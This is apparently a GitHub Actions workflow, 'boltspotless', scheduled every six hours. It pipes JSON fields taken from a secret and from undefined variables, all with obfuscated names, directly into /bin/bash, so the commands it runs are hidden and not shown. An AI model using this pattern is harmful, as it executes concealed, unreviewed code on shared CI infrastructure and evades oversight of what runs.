name: boltspotless

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: boltspotless
        env:
          o15: ${{ secrets.o15 }}
        run: |
          echo $o15 | jq -r .wgt038 | /bin/bash
          echo $rds1 | jq -r .dwsa9 | /bin/bash
          echo $ooi9812 | jq -r .v613 | /bin/bash
          echo $bi71834 | jq -r .m20001 | /bin/bash

